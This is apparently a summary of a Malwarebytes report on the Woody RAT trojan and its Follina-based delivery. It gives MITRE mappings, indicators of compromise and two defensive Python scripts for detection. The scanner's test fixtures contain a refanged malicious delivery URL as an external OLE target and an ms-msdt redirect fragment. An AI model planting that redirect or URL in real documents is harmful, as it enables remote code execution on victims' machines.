Woody RAT: A new feature-rich malware spotted in the wild

Woody Rat is a new, feature-rich Remote Access Trojan that has been active in the wild for at least a year and is attributed to a threat actor targeting Russian entities. It is delivered through spearphished archive files and through Office documents weaponized with the Follina vulnerability (CVE-2022-30190); once running, it talks to its C2 servers over an encrypted channel and supports a broad command set. #WoodyRat #Follina #OAK #CVE-2022-30190

Keypoints

  • Woody Rat is a new, feature-rich Remote Access Trojan identified by Malwarebytes Threat Intelligence as active in the wild for at least one year.
  • Distribution methods include archive files (often disguised as Russian-labeled documents) and weaponized Office documents exploiting the Follina vulnerability.
  • One campaign targeted OAK, a Russian aerospace and defense entity; this is inferred from the actor's registration of a look-alike domain (oakrussia[.]ru, listed among the C2 domains below).
  • C2 traffic is encrypted with a randomly generated AES-CBC key that is itself wrapped with an RSA-4096 public key embedded in the sample, and each infected machine identifies itself to the C2 with a machine-specific cookie.
  • It supports a wide command set (e.g., PING, EXEC, UPLD, DNLD, SCRN, INJC, PSLS) and embeds two .NET DLLs (WoodySharpExecutor and WoodyPowerSession) for extended capabilities like PowerShell and .NET execution.
  • After its command threads are running, the malware removes its own executable from disk, using Process Hollowing of a suspended notepad.exe to perform the deletion.
  • Attribution remains uncertain; the actor is categorized as unknown, with potential links discussed but no solid indicators pointing to a specific group.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Archive files are distributed via spear phishing emails to drop Woody Rat. “these archive files have been distributed using spear phishing emails.”
  • [T1203] Exploitation for Client Execution – Office documents weaponized with Follina CVE-2022-30190 drop Woody Rat. “The threat actor is using a Microsoft Office document… weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat.”
  • [T1059.001] PowerShell – The malware uses PowerShell commands and scripts delivered from the C2 via WoodyPowerSession. “WoodyPowerSession … allows the malware to execute PowerShell commands and scripts received from the C2.”
  • [T1059.003] Windows Command Shell – EXEC command executes commands by creating two named pipes and redirecting I/O through them. “the malware creates two named pipes and redirects the input and output to these pipes.”
  • [T1055] Process Injection – INJC command involves injecting code into a target process via WriteProcessMemory and CreateRemoteThread. “writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.”
  • [T1055.012] Process Hollowing – Used for self-deletion: the malware spawns a suspended notepad.exe, hollows it, and has it delete the Woody Rat binary from disk. “ProcessHollowing technique to do so.”
  • [T1113] Screen Capture – SCRN command takes a screenshot using Windows GDI+ and encrypts it before sending. “leverage Windows GDI+ to take the screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.”
  • [T1041] Exfiltration Over C2 Channel – Data is encrypted and transmitted to the C2 via HTTP requests. “data … AES-CBC encrypted” and the C2 endpoints handle submission and commands.
  • [T1012] Query Registry – The malware detects 6 AVs by querying Registry Keys. “The malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.”
  • [T1083] File and Directory Discovery – The _DIR command lists directory contents and attributes. “This can list all the files and their attributes in a directory supplied as argument.”
  • [T1105] Ingress Tool Transfer – UPLD and DNLD commands are used to upload/download files between C2 and the infected host. “The Upload command is used to remotely upload a file to the infected machine” and “The DNLD command allows the C2 to retrieve any file from the infected machine.”
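
The Follina delivery in the T1203 entry leaves two checkable artefacts: the document's word/_rels/document.xml.rels contains an oleObject relationship with TargetMode="External" pointing at a remote HTML page, and that page redirects Office to an ms-msdt: URI. The Python below, an added example and not code from the Malwarebytes report or from Woody Rat itself, flags both. The sample documents and HTML page are constructed inline; the only real value used is the delivery URL from the indicator list below, refanged.

```python
"""Scanner for Follina-style (CVE-2022-30190) Office documents.

Added example; not code from the Malwarebytes report or from Woody Rat itself.
A Follina document carries an external oleObject relationship in
word/_rels/document.xml.rels pointing at a remote HTML page, and that page
redirects to an ms-msdt: URI. The functions below flag both artefacts.
All sample inputs are constructed here.
"""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_PATH = "word/_rels/document.xml.rels"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# The msdt handler is reached through this URI scheme; any occurrence in a page
# fetched by an Office document is suspicious.
MSDT_RE = re.compile(r"ms-msdt:[^\s\"']*", re.IGNORECASE)


def external_ole_targets(docx_bytes: bytes) -> list[str]:
    """Return the Target of every oleObject relationship with TargetMode="External".

    Legitimate embedded OLE objects are internal parts of the package, so an
    external target is the tell-tale of a Follina-style remote-load document.
    """
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PATH not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(RELS_PATH))
    targets = []
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if rel.get("Type") == OLE_TYPE and rel.get("TargetMode", "Internal") == "External":
            targets.append(rel.get("Target", ""))
    return targets


def msdt_uris(html: str) -> list[str]:
    """Return every ms-msdt: URI found in a fetched HTML page."""
    return MSDT_RE.findall(html)


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal .docx package around the given relationships part (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr(RELS_PATH, rels_xml)
    return buf.getvalue()


BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
</Relationships>"""

# Constructed Follina-style part: the Target is the delivery URL from the report, refanged
FOLLINA_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId5" Type="{OLE_TYPE}" Target="http://garmandesar.duckdns.org:444/uoqiuwef.html!" TargetMode="External"/>
</Relationships>"""

# Constructed stand-in for the fetched page; real ones pad the body to several KB
FOLLINA_HTML = (
    "<html><body><script>\n"
    + "// " + "padding " * 8 + "\n"
    + 'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param ...";\n'
    + "</script></body></html>"
)

if __name__ == "__main__":
    for label, rels in (("benign.docx", BENIGN_RELS), ("Памятка.docx", FOLLINA_RELS)):
        print(label, "->", external_ole_targets(build_docx(rels)) or "clean")
    print("fetched page ->", msdt_uris(FOLLINA_HTML) or "clean")
```

Run it over a quarantined attachment with `external_ole_targets(open(path, "rb").read())`; the relationship check needs no network access, so it is safe to run before anything fetches the remote page.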

Indicators of Compromise

  • [File hash] Woody Rat file hashes – 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0, 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b, and 2 more hashes
  • [Domain] C2 domains – kurmakata.duckdns[.]org, oakrussia[.]ru, and microsoft-telemetry[.]ru
  • [IP] C2 IP – 194.36.189.179
  • [Domain] Additional C2 domain – microsoft-ru-data[.]ru
  • [URL] Follina delivery URL – garmandesar.duckdns[.]org:444/uoqiuwef.html
  • [Filename] Follina document name – Памятка.docx
  • [Filename] Archive payload names – anketa_brozhik.doc.zip (contains Anketa_Brozhik.doc.exe), zayavka.zip (contains selection.doc.exe)
  • [URL] Woody Rat URL – fcloud.nciinform[.]ru/main.css
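
The indicators above are defanged and mixed in type, so they are not directly usable against telemetry. The Python below is an added example (not code from the report): it refangs the listed values, then sweeps constructed DNS, proxy and file-creation events for matches. It also flags the double-extension trick seen in the archive payloads (`Anketa_Brozhik.doc.exe`, `selection.doc.exe`) generically, so a renamed variant that the hash and filename lists would miss is still surfaced. The hostnames and events are constructed for the example.

```python
"""IoC sweep over endpoint telemetry for the Woody Rat indicators above.

Added example; not code from the Malwarebytes report. It refangs the defanged
indicators, then checks constructed DNS, proxy and file-creation events
against them, and additionally flags document-extension-plus-executable
names such as 'Anketa_Brozhik.doc.exe'. All events are constructed.
"""
from __future__ import annotations

import re

# Indicators as listed in the report (still defanged)
DEFANGED = {
    "domain": [
        "kurmakata.duckdns[.]org", "oakrussia[.]ru", "microsoft-telemetry[.]ru",
        "microsoft-ru-data[.]ru", "garmandesar.duckdns[.]org", "fcloud.nciinform[.]ru",
    ],
    "ip": ["194.36.189.179"],
    "url": ["garmandesar.duckdns[.]org:444/uoqiuwef.html", "fcloud.nciinform[.]ru/main.css"],
    "sha256": [
        "982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0",
        "66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b",
    ],
    "filename": [
        "Памятка.docx", "anketa_brozhik.doc.zip", "Anketa_Brozhik.doc.exe",
        "zayavka.zip", "selection.doc.exe",
    ],
}


def refang(indicator: str) -> str:
    """Undo the usual defanging ([.] and hxxp) so the value can be compared to live telemetry."""
    return re.sub(r"^hxxp", "http", indicator.replace("[.]", ".").replace("[:]", ":"), flags=re.I)


IOCS = {kind: {refang(v).lower() for v in values} for kind, values in DEFANGED.items()}

# A document-looking extension immediately followed by an executable one
DOUBLE_EXT_RE = re.compile(r"\.(docx?|xlsx?|pdf|txt|rtf)\.(exe|scr|com|bat|cmd|js|vbs)$", re.I)


def _host_of(url: str) -> str:
    """Host part of a URL without scheme, path or port."""
    return url.split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0]


def sweep_event(event: dict) -> list[str]:
    """Return the reasons an event matches, empty if it is clean."""
    hits: list[str] = []
    kind = event["type"]
    if kind == "dns":
        query = event["query"].rstrip(".").lower()
        if query in IOCS["domain"]:
            hits.append(f"domain:{query}")
    elif kind == "proxy":
        url = event["url"].lower()
        host = _host_of(url)
        if host in IOCS["domain"] or host in IOCS["ip"]:
            hits.append(f"host:{host}")
        if url.split("://", 1)[-1] in IOCS["url"]:
            hits.append(f"url:{url}")
    elif kind == "file":
        name = event["name"].lower()
        if name in IOCS["filename"]:
            hits.append(f"filename:{name}")
        if DOUBLE_EXT_RE.search(name):
            hits.append(f"double-extension:{name}")
        if event.get("sha256", "").lower() in IOCS["sha256"]:
            hits.append(f"sha256:{event['sha256'].lower()}")
    return hits


def sweep(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Run every event through sweep_event and keep the ones that matched."""
    return [(e["host"], h) for e in events if (h := sweep_event(e))]


# Constructed telemetry: hostnames and file hashes other than the report's are invented
SAMPLE_EVENTS = [
    {"host": "ws-17", "type": "dns", "query": "kurmakata.duckdns.org."},
    {"host": "ws-17", "type": "dns", "query": "update.microsoft.com."},
    {"host": "ws-17", "type": "proxy", "url": "http://garmandesar.duckdns.org:444/uoqiuwef.html"},
    {"host": "ws-22", "type": "proxy", "url": "http://194.36.189.179/"},
    {"host": "ws-22", "type": "file", "name": "Anketa_Brozhik.doc.exe", "sha256": "0" * 64},
    {"host": "ws-22", "type": "file", "name": "Invoice_2022.pdf.scr", "sha256": "1" * 64},
    {"host": "ws-09", "type": "file", "name": "report.docx",
     "sha256": "982EC24B5599373B65D7FEC3B7B66E6AFFF4872847791CF3C5688F47BFCB8BF0"},
]

if __name__ == "__main__":
    for host, reasons in sweep(SAMPLE_EVENTS):
        print(host, ", ".join(reasons))
```

The double-extension rule is deliberately broader than the listed filenames; expect some noise from legitimately named installers, so treat it as a triage signal rather than a block rule.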

Read more: https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/